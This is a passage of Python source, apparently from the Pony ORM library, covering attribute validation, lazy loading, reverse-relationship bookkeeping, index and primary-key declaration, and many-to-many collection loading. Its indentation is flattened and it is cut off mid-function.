if not attr.converters:
return val if type(val) is attr.py_type else attr.py_type(val)
if len(attr.converters) != 1: throw(NotImplementedError)
converter = attr.converters[0]
if converter is not None:
try:
if from_db: return converter.sql2py(val)
val = converter.validate(val, obj)
except UnicodeDecodeError as e:
throw(ValueError, 'Value for attribute %s cannot be converted to %s: %s'
% (attr, unicode.__name__, truncate_repr(val)))
else:
rentity = reverse.entity
if not isinstance(val, rentity):
vals = val if type(val) is tuple else (val,)
if len(vals) != len(rentity._pk_columns_): throw(TypeError,
'Invalid number of columns were specified for attribute %s. Expected: %d, got: %d'
% (attr, len(rentity._pk_columns_), len(vals)))
try: val = rentity._get_by_raw_pkval_(vals, from_db=from_db)
except TypeError: throw(TypeError, 'Attribute %s must be of %s type. Got: %r'
% (attr, rentity.__name__, val))
else:
if obj is not None and obj._status_ is not None: cache = obj._session_cache_
else: cache = entity._database_._get_cache()
if cache is not val._session_cache_:
throw(TransactionError, 'An attempt to mix objects belonging to different transactions')
if attr.py_check is not None and not attr.py_check(val):
throw(ValueError, 'Check for attribute %s failed. Value: %s' % (attr, truncate_repr(val)))
return val
def parse_value(attr, row, offsets):
assert len(attr.columns) == len(offsets)
if not attr.reverse:
if len(offsets) > 1: throw(NotImplementedError)
offset = offsets[0]
val = attr.validate(row[offset], None, attr.entity, from_db=True)
else:
vals = [ row[offset] for offset in offsets ]
if None in vals:
assert len(set(vals)) == 1
val = None
else: val = attr.py_type._get_by_raw_pkval_(vals)
return val
def load(attr, obj):
cache = obj._session_cache_
if cache is None or not cache.is_alive: throw_db_session_is_over('load attribute', obj, attr)
if not attr.columns:
reverse = attr.reverse
assert reverse is not None and reverse.columns
dbval = reverse.entity._find_in_db_({reverse : obj})
if dbval is None: obj._vals_[attr] = None
else: assert obj._vals_[attr] == dbval
return dbval
if attr.lazy:
entity = attr.entity
database = entity._database_
if not attr.lazy_sql_cache:
select_list = [ 'ALL' ] + [ [ 'COLUMN', None, column ] for column in attr.columns ]
from_list = [ 'FROM', [ None, 'TABLE', entity._table_ ] ]
pk_columns = entity._pk_columns_
pk_converters = entity._pk_converters_
criteria_list = [ [ converter.EQ, [ 'COLUMN', None, column ], [ 'PARAM', (i, None, None), converter ] ]
for i, (column, converter) in enumerate(izip(pk_columns, pk_converters)) ]
sql_ast = [ 'SELECT', select_list, from_list, [ 'WHERE' ] + criteria_list ]
sql, adapter = database._ast2sql(sql_ast)
offsets = tuple(xrange(len(attr.columns)))
attr.lazy_sql_cache = sql, adapter, offsets
else: sql, adapter, offsets = attr.lazy_sql_cache
arguments = adapter(obj._get_raw_pkval_())
cursor = database._exec_sql(sql, arguments)
row = cursor.fetchone()
dbval = attr.parse_value(row, offsets)
attr.db_set(obj, dbval)
else: obj._load_()
return obj._vals_[attr]
@cut_traceback
def __get__(attr, obj, cls=None):
if obj is None: return attr
if attr.pk_offset is not None: return attr.get(obj)
value = attr.get(obj)
bit = obj._bits_except_volatile_[attr]
wbits = obj._wbits_
if wbits is not None and not wbits & bit: obj._rbits_ |= bit
return value
def get(attr, obj):
if attr.pk_offset is None and obj._status_ in ('deleted', 'cancelled'):
throw_object_was_deleted(obj)
vals = obj._vals_
if vals is None: throw_db_session_is_over('read value of', obj, attr)
val = vals[attr] if attr in vals else attr.load(obj)
if val is not None and attr.reverse and val._subclasses_ and val._status_ not in ('deleted', 'cancelled'):
cache = obj._session_cache_
if cache is not None and val in cache.seeds[val._pk_attrs_]:
val._load_()
return val
@cut_traceback
def __set__(attr, obj, new_val, undo_funcs=None):
cache = obj._session_cache_
if cache is None or not cache.is_alive: throw_db_session_is_over('assign new value to', obj, attr)
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
reverse = attr.reverse
new_val = attr.validate(new_val, obj, from_db=False)
if attr.pk_offset is not None:
pkval = obj._pkval_
if pkval is None: pass
elif obj._pk_is_composite_:
if new_val == pkval[attr.pk_offset]: return
elif new_val == pkval: return
throw(TypeError, 'Cannot change value of primary key')
with cache.flush_disabled():
old_val = obj._vals_.get(attr, NOT_LOADED)
if old_val is NOT_LOADED and reverse and not reverse.is_collection:
old_val = attr.load(obj)
status = obj._status_
wbits = obj._wbits_
bit = obj._bits_[attr]
objects_to_save = cache.objects_to_save
objects_to_save_needs_undo = False
if wbits is not None and bit:
obj._wbits_ = wbits | bit
if status != 'modified':
assert status in ('loaded', 'inserted', 'updated')
assert obj._save_pos_ is None
obj._status_ = 'modified'
obj._save_pos_ = len(objects_to_save)
objects_to_save.append(obj)
objects_to_save_needs_undo = True
cache.modified = True
if not attr.reverse and not attr.is_part_of_unique_index:
obj._vals_[attr] = new_val
return
is_reverse_call = undo_funcs is not None
if not is_reverse_call: undo_funcs = []
undo = []
def undo_func():
obj._status_ = status
obj._wbits_ = wbits
if objects_to_save_needs_undo:
assert objects_to_save
obj2 = objects_to_save.pop()
assert obj2 is obj and obj._save_pos_ == len(objects_to_save)
obj._save_pos_ = None
if old_val is NOT_LOADED: obj._vals_.pop(attr)
else: obj._vals_[attr] = old_val
for cache_index, old_key, new_key in undo:
if new_key is not None: del cache_index[new_key]
if old_key is not None: cache_index[old_key] = obj
undo_funcs.append(undo_func)
if old_val == new_val: return
try:
if attr.is_unique:
cache.update_simple_index(obj, attr, old_val, new_val, undo)
get_val = obj._vals_.get
for attrs, i in attr.composite_keys:
vals = [ get_val(a) for a in attrs ] # In Python 2 var name leaks into the function scope!
prev_vals = tuple(vals)
vals[i] = new_val
new_vals = tuple(vals)
cache.update_composite_index(obj, attrs, prev_vals, new_vals, undo)
obj._vals_[attr] = new_val
if not reverse: pass
elif not is_reverse_call: attr.update_reverse(obj, old_val, new_val, undo_funcs)
elif old_val not in (None, NOT_LOADED):
if not reverse.is_collection:
if new_val is not None:
if reverse.is_required: throw(ConstraintError,
'Cannot unlink %r from previous %s object, because %r attribute is required'
% (old_val, obj, reverse))
reverse.__set__(old_val, None, undo_funcs)
elif isinstance(reverse, Set):
reverse.reverse_remove((old_val,), obj, undo_funcs)
else: throw(NotImplementedError)
except:
if not is_reverse_call:
for undo_func in reversed(undo_funcs): undo_func()
raise
def db_set(attr, obj, new_dbval, is_reverse_call=False):
cache = obj._session_cache_
assert cache is not None and cache.is_alive
assert obj._status_ not in created_or_deleted_statuses
assert attr.pk_offset is None
if new_dbval is NOT_LOADED: assert is_reverse_call
old_dbval = obj._dbvals_.get(attr, NOT_LOADED)
if old_dbval is not NOT_LOADED:
if old_dbval == new_dbval or (
not attr.reverse and attr.converters[0].dbvals_equal(old_dbval, new_dbval)):
return
bit = obj._bits_except_volatile_[attr]
if obj._rbits_ & bit:
assert old_dbval is not NOT_LOADED
msg = 'Value of %s for %s was updated outside of current transaction' % (attr, obj)
if new_dbval is not NOT_LOADED:
msg = '%s (was: %s, now: %s)' % (msg, old_dbval, new_dbval)
elif isinstance(attr.reverse, Optional):
assert old_dbval is not None
msg = "Multiple %s objects linked with the same %s object. " \
"Maybe %s attribute should be Set instead of Optional" \
% (attr.entity.__name__, old_dbval, attr.reverse)
throw(UnrepeatableReadError, msg)
if new_dbval is NOT_LOADED: obj._dbvals_.pop(attr, None)
else: obj._dbvals_[attr] = new_dbval
wbit = bool(obj._wbits_ & bit)
if not wbit:
old_val = obj._vals_.get(attr, NOT_LOADED)
assert old_val == old_dbval, (old_val, old_dbval)
if attr.is_part_of_unique_index:
if attr.is_unique: cache.db_update_simple_index(obj, attr, old_val, new_dbval)
get_val = obj._vals_.get
for attrs, i in attr.composite_keys:
vals = [ get_val(a) for a in attrs ] # In Python 2 var name leaks into the function scope!
old_vals = tuple(vals)
vals[i] = new_dbval
new_vals = tuple(vals)
cache.db_update_composite_index(obj, attrs, old_vals, new_vals)
if new_dbval is NOT_LOADED:
obj._vals_.pop(attr, None)
elif attr.reverse:
obj._vals_[attr] = new_dbval
else:
assert len(attr.converters) == 1
obj._vals_[attr] = attr.converters[0].dbval2val(new_dbval, obj)
reverse = attr.reverse
if not reverse: pass
elif not is_reverse_call: attr.db_update_reverse(obj, old_dbval, new_dbval)
elif old_dbval not in (None, NOT_LOADED):
if not reverse.is_collection:
if new_dbval is not NOT_LOADED: reverse.db_set(old_dbval, NOT_LOADED, is_reverse_call=True)
elif isinstance(reverse, Set):
reverse.db_reverse_remove((old_dbval,), obj)
else: throw(NotImplementedError)
def update_reverse(attr, obj, old_val, new_val, undo_funcs):
reverse = attr.reverse
if not reverse.is_collection:
if old_val not in (None, NOT_LOADED):
if attr.cascade_delete: old_val._delete_(undo_funcs)
elif reverse.is_required: throw(ConstraintError,
'Cannot unlink %r from previous %s object, because %r attribute is required'
% (old_val, obj, reverse))
else: reverse.__set__(old_val, None, undo_funcs)
if new_val is not None: reverse.__set__(new_val, obj, undo_funcs)
elif isinstance(reverse, Set):
if old_val not in (None, NOT_LOADED): reverse.reverse_remove((old_val,), obj, undo_funcs)
if new_val is not None: reverse.reverse_add((new_val,), obj, undo_funcs)
else: throw(NotImplementedError)
def db_update_reverse(attr, obj, old_dbval, new_dbval):
reverse = attr.reverse
if not reverse.is_collection:
if old_dbval not in (None, NOT_LOADED): reverse.db_set(old_dbval, NOT_LOADED, True)
if new_dbval is not None: reverse.db_set(new_dbval, obj, True)
elif isinstance(reverse, Set):
if old_dbval not in (None, NOT_LOADED): reverse.db_reverse_remove((old_dbval,), obj)
if new_dbval is not None: reverse.db_reverse_add((new_dbval,), obj)
else: throw(NotImplementedError)
def __delete__(attr, obj):
throw(NotImplementedError)
def get_raw_values(attr, val):
reverse = attr.reverse
if not reverse: return (val,)
rentity = reverse.entity
if val is None: return rentity._pk_nones_
return val._get_raw_pkval_()
def get_columns(attr):
assert not attr.is_collection
assert not isinstance(attr.py_type, basestring)
if attr._columns_checked: return attr.columns
provider = attr.entity._database_.provider
reverse = attr.reverse
if not reverse: # attr is not part of relationship
if not attr.columns: attr.columns = provider.get_default_column_names(attr)
elif len(attr.columns) > 1: throw(MappingError, "Too many columns were specified for %s" % attr)
attr.col_paths = [ attr.name ]
attr.converters = [ provider.get_converter_by_attr(attr) ]
else:
def generate_columns():
reverse_pk_columns = reverse.entity._get_pk_columns_()
reverse_pk_col_paths = reverse.entity._pk_paths_
if not attr.columns:
attr.columns = provider.get_default_column_names(attr, reverse_pk_columns)
elif len(attr.columns) != len(reverse_pk_columns): throw(MappingError,
'Invalid number of columns specified for %s' % attr)
attr.col_paths = [ '-'.join((attr.name, paths)) for paths in reverse_pk_col_paths ]
attr.converters = []
for a in reverse.entity._pk_attrs_:
attr.converters.extend(a.converters)
if reverse.is_collection: # one-to-many:
generate_columns()
# one-to-one:
elif attr.is_required:
assert not reverse.is_required
generate_columns()
elif attr.columns: generate_columns()
elif reverse.columns: pass
elif reverse.is_required: pass
elif attr.entity.__name__ > reverse.entity.__name__: pass
else: generate_columns()
attr._columns_checked = True
if len(attr.columns) == 1: attr.column = attr.columns[0]
else: attr.column = None
return attr.columns
@property
def asc(attr):
return attr
@property
def desc(attr):
return DescWrapper(attr)
def describe(attr):
t = attr.py_type
if isinstance(t, type): t = t.__name__
options = []
if attr.args: options.append(', '.join(imap(str, attr.args)))
if attr.auto: options.append('auto=True')
if not isinstance(attr, PrimaryKey) and attr.is_unique: options.append('unique=True')
if attr.default is not None: options.append('default=%r' % attr.default)
if not options: options = ''
else: options = ', ' + ', '.join(options)
result = "%s(%s%s)" % (attr.__class__.__name__, t, options)
return "%s = %s" % (attr.name, result)
class Optional(Attribute):
__slots__ = []
class Required(Attribute):
__slots__ = []
def validate(attr, val, obj=None, entity=None, from_db=False):
val = Attribute.validate(attr, val, obj, entity, from_db)
if val == '' or (val is None and not (attr.auto or attr.is_volatile or attr.sql_default)):
if not from_db:
throw(ValueError, 'Attribute %s is required' % (
attr if obj is None or obj._status_ is None else '%r.%s' % (obj, attr.name)))
else:
warnings.warn('Database contains %s for required attribute %s'
% ('NULL' if val is None else 'empty string', attr),
DatabaseContainsIncorrectEmptyValue)
return val
class Discriminator(Required):
__slots__ = [ 'code2cls' ]
def __init__(attr, py_type, *args, **kwargs):
Attribute.__init__(attr, py_type, *args, **kwargs)
attr.code2cls = {}
def _init_(attr, entity, name):
if entity._root_ is not entity: throw(ERDiagramError,
'Discriminator attribute %s cannot be declared in subclass' % attr)
Required._init_(attr, entity, name)
entity._discriminator_attr_ = attr
@staticmethod
def create_default_attr(entity):
if hasattr(entity, 'classtype'): throw(ERDiagramError,
"Cannot create discriminator column for %s automatically "
"because name 'classtype' is already in use" % entity.__name__)
attr = Discriminator(str, column='classtype')
attr.is_implicit = True
attr._init_(entity, 'classtype')
entity._attrs_.append(attr)
entity._new_attrs_.append(attr)
entity._adict_['classtype'] = attr
entity.classtype = attr
attr.process_entity_inheritance(entity)
def process_entity_inheritance(attr, entity):
if '_discriminator_' not in entity.__dict__:
entity._discriminator_ = entity.__name__
discr_value = entity._discriminator_
if discr_value is not None:
try: entity._discriminator_ = discr_value = attr.validate(discr_value)
except ValueError: throw(TypeError,
"Incorrect discriminator value is set for %s attribute '%s' of '%s' type: %r"
% (entity.__name__, attr.name, attr.py_type.__name__, discr_value))
elif issubclass(attr.py_type, basestring):
discr_value = entity._discriminator_ = entity.__name__
else: throw(TypeError, "Discriminator value for entity %s "
"with custom discriminator column '%s' of '%s' type is not set"
% (entity.__name__, attr.name, attr.py_type.__name__))
attr.code2cls[discr_value] = entity
def validate(attr, val, obj=None, entity=None, from_db=False):
if from_db: return val
elif val is DEFAULT:
assert entity is not None
return entity._discriminator_
return Attribute.validate(attr, val, obj, entity)
def load(attr, obj):
assert False # pragma: no cover
def __get__(attr, obj, cls=None):
if obj is None: return attr
return obj._discriminator_
def __set__(attr, obj, new_val):
throw(TypeError, 'Cannot assign value to discriminator attribute')
def db_set(attr, obj, new_dbval):
assert False # pragma: no cover
def update_reverse(attr, obj, old_val, new_val, undo_funcs):
assert False # pragma: no cover
class Index(object):
__slots__ = 'entity', 'attrs', 'is_pk', 'is_unique'
def __init__(index, *attrs, **options):
index.entity = None
index.attrs = list(attrs)
index.is_pk = options.pop('is_pk', False)
index.is_unique = options.pop('is_unique', True)
assert not options
def _init_(index, entity):
index.entity = entity
attrs = index.attrs
for i, attr in enumerate(index.attrs):
if isinstance(attr, basestring):
try: attr = getattr(entity, attr)
except AttributeError: throw(AttributeError,
'Entity %s does not have attribute %s' % (entity.__name__, attr))
attrs[i] = attr
index.attrs = attrs = tuple(attrs)
for i, attr in enumerate(attrs):
if not isinstance(attr, Attribute):
func_name = 'PrimaryKey' if index.is_pk else 'composite_key' if index.is_unique else 'composite_index'
throw(TypeError, '%s() arguments must be attributes. Got: %r' % (func_name, attr))
if index.is_unique:
attr.is_part_of_unique_index = True
if len(attrs) > 1: attr.composite_keys.append((attrs, i))
if not issubclass(entity, attr.entity): throw(ERDiagramError,
'Invalid use of attribute %s in entity %s' % (attr, entity.__name__))
key_type = 'primary key' if index.is_pk else 'unique index' if index.is_unique else 'index'
if attr.is_collection or (index.is_pk and not attr.is_required and not attr.auto):
throw(TypeError, '%s attribute %s cannot be part of %s' % (attr.__class__.__name__, attr, key_type))
if isinstance(attr.py_type, type) and issubclass(attr.py_type, float):
throw(TypeError, 'Attribute %s of type float cannot be part of %s' % (attr, key_type))
if index.is_pk and attr.is_volatile:
throw(TypeError, 'Volatile attribute %s cannot be part of primary key' % attr)
if not attr.is_required:
if attr.nullable is False:
throw(TypeError, 'Optional attribute %s must be nullable, because it is part of composite key' % attr)
attr.nullable = True
if attr.is_string and attr.default == '' and not hasattr(attr, 'original_default'):
attr.default = None
def _define_index(func_name, attrs, is_unique=False):
if len(attrs) < 2: throw(TypeError,
'%s() must receive at least two attributes as arguments' % func_name)
cls_dict = sys._getframe(2).f_locals
indexes = cls_dict.setdefault('_indexes_', [])
indexes.append(Index(*attrs, is_pk=False, is_unique=is_unique))
def composite_index(*attrs):
_define_index('composite_index', attrs)
def composite_key(*attrs):
_define_index('composite_key', attrs, is_unique=True)
class PrimaryKey(Required):
__slots__ = []
def __new__(cls, *args, **kwargs):
if not args: throw(TypeError, 'PrimaryKey must receive at least one positional argument')
cls_dict = sys._getframe(1).f_locals
attrs = tuple(a for a in args if isinstance(a, Attribute))
non_attrs = [ a for a in args if not isinstance(a, Attribute) ]
cls_dict = sys._getframe(1).f_locals
if not attrs:
return Required.__new__(cls)
elif non_attrs or kwargs:
throw(TypeError, 'PrimaryKey got invalid arguments: %r %r' % (args, kwargs))
elif len(attrs) == 1:
attr = attrs[0]
attr_name = 'something'
for key, val in iteritems(cls_dict):
if val is attr: attr_name = key; break
py_type = attr.py_type
type_str = py_type.__name__ if type(py_type) is type else repr(py_type)
throw(TypeError, 'Just use %s = PrimaryKey(%s, ...) directly instead of PrimaryKey(%s)'
% (attr_name, type_str, attr_name))
for i, attr in enumerate(attrs):
attr.is_part_of_unique_index = True
attr.composite_keys.append((attrs, i))
indexes = cls_dict.setdefault('_indexes_', [])
indexes.append(Index(*attrs, is_pk=True))
return None
class Collection(Attribute):
__slots__ = 'table', 'wrapper_class', 'symmetric', 'reverse_column', 'reverse_columns', \
'nplus1_threshold', 'cached_load_sql', 'cached_add_m2m_sql', 'cached_remove_m2m_sql', \
'cached_count_sql', 'cached_empty_sql', 'reverse_fk_name'
def __init__(attr, py_type, *args, **kwargs):
if attr.__class__ is Collection: throw(TypeError, "'Collection' is abstract type")
table = kwargs.pop('table', None) # TODO: rename table to link_table or m2m_table
if table is not None and not isinstance(table, basestring):
if not isinstance(table, (list, tuple)):
throw(TypeError, "Parameter 'table' must be a string. Got: %r" % table)
for name_part in table:
if not isinstance(name_part, basestring):
throw(TypeError, 'Each part of table name must be a string. Got: %r' % name_part)
table = tuple(table)
attr.table = table
Attribute.__init__(attr, py_type, *args, **kwargs)
if attr.auto: throw(TypeError, "'auto' option could not be set for collection attribute")
kwargs = attr.kwargs
attr.reverse_column = kwargs.pop('reverse_column', None)
attr.reverse_columns = kwargs.pop('reverse_columns', None)
if attr.reverse_column is not None:
if attr.reverse_columns is not None and attr.reverse_columns != [ attr.reverse_column ]:
throw(TypeError, "Parameters 'reverse_column' and 'reverse_columns' cannot be specified simultaneously")
if not isinstance(attr.reverse_column, basestring):
throw(TypeError, "Parameter 'reverse_column' must be a string. Got: %r" % attr.reverse_column)
attr.reverse_columns = [ attr.reverse_column ]
elif attr.reverse_columns is not None:
if not isinstance(attr.reverse_columns, (tuple, list)):
throw(TypeError, "Parameter 'reverse_columns' must be a list. Got: %r" % attr.reverse_columns)
for reverse_column in attr.reverse_columns:
if not isinstance(reverse_column, basestring):
throw(TypeError, "Parameter 'reverse_columns' must be a list of strings. Got: %r" % attr.reverse_columns)
if len(attr.reverse_columns) == 1: attr.reverse_column = attr.reverse_columns[0]
else: attr.reverse_columns = []
attr.reverse_fk_name = kwargs.pop('reverse_fk_name', None)
attr.nplus1_threshold = kwargs.pop('nplus1_threshold', 1)
attr.cached_load_sql = {}
attr.cached_add_m2m_sql = None
attr.cached_remove_m2m_sql = None
attr.cached_count_sql = None
attr.cached_empty_sql = None
def _init_(attr, entity, name):
Attribute._init_(attr, entity, name)
if attr.is_unique: throw(TypeError,
"'unique' option cannot be set for attribute %s because it is collection" % attr)
if attr.default is not None:
throw(TypeError, 'Default value could not be set for collection attribute')
attr.symmetric = (attr.py_type == entity.__name__ and attr.reverse == name)
if not attr.symmetric and attr.reverse_columns: throw(TypeError,
"'reverse_column' and 'reverse_columns' options can be set for symmetric relations only")
if attr.py_check is not None:
throw(NotImplementedError, "'py_check' parameter is not supported for collection attributes")
def load(attr, obj):
assert False, 'Abstract method' # pragma: no cover
def __get__(attr, obj, cls=None):
assert False, 'Abstract method' # pragma: no cover
def __set__(attr, obj, val):
assert False, 'Abstract method' # pragma: no cover
def __delete__(attr, obj):
assert False, 'Abstract method' # pragma: no cover
def prepare(attr, obj, val, fromdb=False):
assert False, 'Abstract method' # pragma: no cover
def set(attr, obj, val, fromdb=False):
assert False, 'Abstract method' # pragma: no cover
class SetData(set):
__slots__ = 'is_fully_loaded', 'added', 'removed', 'absent', 'count'
def __init__(setdata):
setdata.is_fully_loaded = False
setdata.added = setdata.removed = setdata.absent = None
setdata.count = None
def construct_batchload_criteria_list(alias, columns, converters, batch_size, row_value_syntax, start=0, from_seeds=True):
assert batch_size > 0
def param(i, j, converter):
if from_seeds:
return [ 'PARAM', (i, None, j), converter ]
else:
return [ 'PARAM', (i, j, None), converter ]
if batch_size == 1:
return [ [ converter.EQ, [ 'COLUMN', alias, column ], param(start, j, converter) ]
for j, (column, converter) in enumerate(izip(columns, converters)) ]
if len(columns) == 1:
column = columns[0]
converter = converters[0]
param_list = [ param(i+start, 0, converter) for i in xrange(batch_size) ]
condition = [ 'IN', [ 'COLUMN', alias, column ], param_list ]
return [ condition ]
elif row_value_syntax:
row = [ 'ROW' ] + [ [ 'COLUMN', alias, column ] for column in columns ]
param_list = [ [ 'ROW' ] + [ param(i+start, j, converter) for j, converter in enumerate(converters) ]
for i in xrange(batch_size) ]
condition = [ 'IN', row, param_list ]
return [ condition ]
else:
conditions = [ [ 'AND' ] + [ [ converter.EQ, [ 'COLUMN', alias, column ], param(i+start, j, converter) ]
for j, (column, converter) in enumerate(izip(columns, converters)) ]
for i in xrange(batch_size) ]
return [ [ 'OR' ] + conditions ]
class Set(Collection):
__slots__ = []
def validate(attr, val, obj=None, entity=None, from_db=False):
assert val is not NOT_LOADED
if val is DEFAULT: return set()
reverse = attr.reverse
if val is None: throw(ValueError, 'A single %(cls)s instance or %(cls)s iterable is expected. '
'Got: None' % dict(cls=reverse.entity.__name__))
if entity is not None: pass
elif obj is not None: entity = obj.__class__
else: entity = attr.entity
if not reverse: throw(NotImplementedError)
if isinstance(val, reverse.entity): items = set((val,))
else:
rentity = reverse.entity
try: items = set(val)
except TypeError: throw(TypeError, 'Item of collection %s.%s must be an instance of %s. Got: %r'
% (entity.__name__, attr.name, rentity.__name__, val))
for item in items:
if not isinstance(item, rentity):
throw(TypeError, 'Item of collection %s.%s must be an instance of %s. Got: %r'
% (entity.__name__, attr.name, rentity.__name__, item))
if obj is not None and obj._status_ is not None: cache = obj._session_cache_
else: cache = entity._database_._get_cache()
for item in items:
if item._session_cache_ is not cache:
throw(TransactionError, 'An attempt to mix objects belonging to different transactions')
return items
def load(attr, obj, items=None):
cache = obj._session_cache_
if cache is None or not cache.is_alive: throw_db_session_is_over('load collection', obj, attr)
assert obj._status_ not in del_statuses
setdata = obj._vals_.get(attr)
if setdata is None: setdata = obj._vals_[attr] = SetData()
elif setdata.is_fully_loaded: return setdata
entity = attr.entity
reverse = attr.reverse
rentity = reverse.entity
if not reverse: throw(NotImplementedError)
database = obj._database_
if cache is not database._get_cache():
throw(TransactionError, "Transaction of object %s belongs to different thread")
if items:
if not reverse.is_collection:
items = {item for item in items if reverse not in item._vals_}
else:
items = set(items)
items -= setdata
if setdata.removed: items -= setdata.removed
if not items: return setdata
if items and (attr.lazy or not setdata):
items = list(items)
if not reverse.is_collection:
sql, adapter, attr_offsets = rentity._construct_batchload_sql_(len(items))
arguments = adapter(items)
cursor = database._exec_sql(sql, arguments)
items = rentity._fetch_objects(cursor, attr_offsets)
return setdata
sql, adapter = attr.construct_sql_m2m(1, len(items))
items.append(obj)
arguments = adapter(items)
cursor = database._exec_sql(sql, arguments)
loaded_items = {rentity._get_by_raw_pkval_(row) for row in cursor.fetchall()}
setdata |= loaded_items
reverse.db_reverse_add(loaded_items, obj)
return setdata
counter = cache.collection_statistics.setdefault(attr, 0)
nplus1_threshold = attr.nplus1_threshold
prefetching = options.PREFETCHING and not attr.lazy and nplus1_threshold is not None \
and (counter >= nplus1_threshold or cache.noflush_counter)
objects = [ obj ]
setdata_list = [ setdata ]
if prefetching:
pk_index = cache.indexes[entity._pk_attrs_]
max_batch_size = database.provider.max_params_count // len(entity._pk_columns_)
for obj2 in itervalues(pk_index):
if obj2 is obj: continue
if obj2._status_ in created_or_deleted_statuses: continue
setdata2 = obj2._vals_.get(attr)
if setdata2 is None: setdata2 = obj2._vals_[attr] = SetData()
elif setdata2.is_fully_loaded: continue
objects.append(obj2)
setdata_list.append(setdata2)
if len(objects) >= max_batch_size: break
if not reverse.is_collection:
sql, adapter, attr_offsets = rentity._construct_batchload_sql_(len(objects), reverse)
arguments = adapter(objects)
cursor = database._exec_sql(sql, arguments)
items = rentity._fetch_objects(cursor, attr_offsets)
else:
sql, adapter = attr.construct_sql_m2m(len(objects))
arguments = adapter(objects)
cursor = database._exec_sql(sql, arguments)
pk_len = len(entity._pk_columns_)
d = {}
if len(objects) > 1:
for row in cursor.fetchall():
obj2 = entity._get_by_raw_pkval_(row[:pk_len])
item = rentity._get_by_raw_pkval_(row[pk_len:])
items = d.get(obj2)
if items is None: items = d[obj2] = set()
items.add(item)
else: d[obj] = {rentity._get_by_raw_pkval_(row) for row in cursor.fetchall()}
for obj2, items in iteritems(d):
setdata2 = obj2._vals_.get(attr)
if setdata2 is None: setdata2 = obj._vals_[attr] = SetData()
else:
phantoms = setdata2 - items
if setdata2.added: phantoms -= setdata2.added
if phantoms: throw(UnrepeatableReadError,
'Phantom object %s disappeared from collection %s.%s'
% (safe_repr(phantoms.pop()), safe_repr(obj), attr.name))
items -= setdata2
if setdata2.removed: items -= setdata2.removed
setdata2 |= items
reverse.db_reverse_add(items, obj2)
for setdata2 in setdata_list:
setdata2.is_fully_loaded = True
setdata2.absent = None
setdata2.count = len(setdata2)
cache.collection_statistics[attr] = counter + 1
return setdata
def construct_sql_m2m(attr, batch_size=1, items_count=0):
if items_count:
assert batch_size == 1
cache_key = -items_count
else: cache_key = batch_size
cached_sql = attr.cached_load_sql.get(cache_key)
if cached_sql is not None: return cached_sql
reverse = attr.reverse
assert reverse is not None and reverse.is_collection and issubclass(reverse.py_type, Entity)
table_name = attr.table
assert table_name is not None
select_list = [ 'ALL' ]
if not attr.symmetric:
columns = attr.columns
converters = attr.converters
rcolumns = reverse.columns
rconverters = reverse.converters
else:
columns = attr.reverse_columns
rcolumns = attr.columns
converters = rconverters = attr.converters
if batch_size > 1:
select_list.extend([ 'COLUMN', 'T1', column ] for column in rcolumns)
select_list.extend([ 'COLUMN', 'T1', column ] for column in columns)
from_list = [ 'FROM', [ 'T1', 'TABLE', table_name ]]
database = attr.entity._database_
row_value_syntax = database.provider.translator_cls.row_value_syntax
where_list = [ 'WHERE' ]
where_list += construct_batchload_criteria_list(
'T1', rcolumns, rconverters, batch_size, row_value_syntax, items_count)
if items_count:
where_list += construct_batchload_criteria_list(
'T1', columns, converters, items_count, row_value_syntax)
sql_ast = [ 'SELECT', select_list, from_list, where_list ]
sql, adapter = attr.cached_load_sql[cache_key] = database._ast2sql(sql_ast)
return sql, adapter
def copy(attr, obj):
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
if obj._vals_ is None: throw_db_session_is_over('read value of', obj, attr)
setdata = obj._vals_.get(attr)
if setdata is None or not setdata.is_fully_loaded: setdata = attr.load(obj)
reverse = attr.reverse
if not reverse.is_collection and reverse.pk_offset is None:
added = setdata.added or ()
for item in setdata:
if item in added: continue
bit = item._bits_except_volatile_[reverse]
assert item._wbits_ is not None
if not item._wbits_ & bit: item._rbits_ |= bit
return set(setdata)
@cut_traceback
def __get__(attr, obj, cls=None):
if obj is None: return attr
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
rentity = attr.py_type
wrapper_class = rentity._get_set_wrapper_subclass_()
return wrapper_class(obj, attr)
@cut_traceback
def __set__(attr, obj, new_items, undo_funcs=None):
if isinstance(new_items, SetInstance) and new_items._obj_ is obj and new_items._attr_ is attr:
return # after += or -=
cache = obj._session_cache_
if cache is None or not cache.is_alive: throw_db_session_is_over('change collection', obj, attr)
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
with cache.flush_disabled():
new_items = attr.validate(new_items, obj)
reverse = attr.reverse
if not reverse: throw(NotImplementedError)
setdata = obj._vals_.get(attr)
if setdata is None:
if obj._status_ == 'created':
setdata = obj._vals_[attr] = SetData()
setdata.is_fully_loaded = True
setdata.count = 0
else: setdata = attr.load(obj)
elif not setdata.is_fully_loaded: setdata = attr.load(obj)
if new_items == setdata: return
to_add = new_items - setdata
to_remove = setdata - new_items
is_reverse_call = undo_funcs is not None
if not is_reverse_call: undo_funcs = []
try:
if not reverse.is_collection:
if attr.cascade_delete:
for item in to_remove: item._delete_(undo_funcs)
else:
for item in to_remove: reverse.__set__(item, None, undo_funcs)
for item in to_add: reverse.__set__(item, obj, undo_funcs)
else:
reverse.reverse_remove(to_remove, obj, undo_funcs)
reverse.reverse_add(to_add, obj, undo_funcs)
except:
if not is_reverse_call:
for undo_func in reversed(undo_funcs): undo_func()
raise
setdata.clear()
setdata |= new_items
if setdata.count is not None: setdata.count = len(new_items)
added = setdata.added
removed = setdata.removed
if to_add:
if removed: (to_add, setdata.removed) = (to_add - removed, removed - to_add)
if added: added |= to_add
else: setdata.added = to_add # added may be None
if to_remove:
if added: (to_remove, setdata.added) = (to_remove - added, added - to_remove)
if removed: removed |= to_remove
else: setdata.removed = to_remove # removed may be None
cache.modified_collections[attr].add(obj)
cache.modified = True
def __delete__(attr, obj):
throw(NotImplementedError)
def reverse_add(attr, objects, item, undo_funcs):
undo = []
cache = item._session_cache_
objects_with_modified_collections = cache.modified_collections[attr]
for obj in objects:
setdata = obj._vals_.get(attr)
if setdata is None: setdata = obj._vals_[attr] = SetData()
else: assert item not in setdata
if setdata.added is None: setdata.added = set()
else: assert item not in setdata.added
in_removed = setdata.removed and item in setdata.removed
was_modified_earlier = obj in objects_with_modified_collections
undo.append((obj, in_removed, was_modified_earlier))
setdata.add(item)
if setdata.count is not None: setdata.count += 1
if in_removed: setdata.removed.remove(item)
else: setdata.added.add(item)
objects_with_modified_collections.add(obj)
def undo_func():
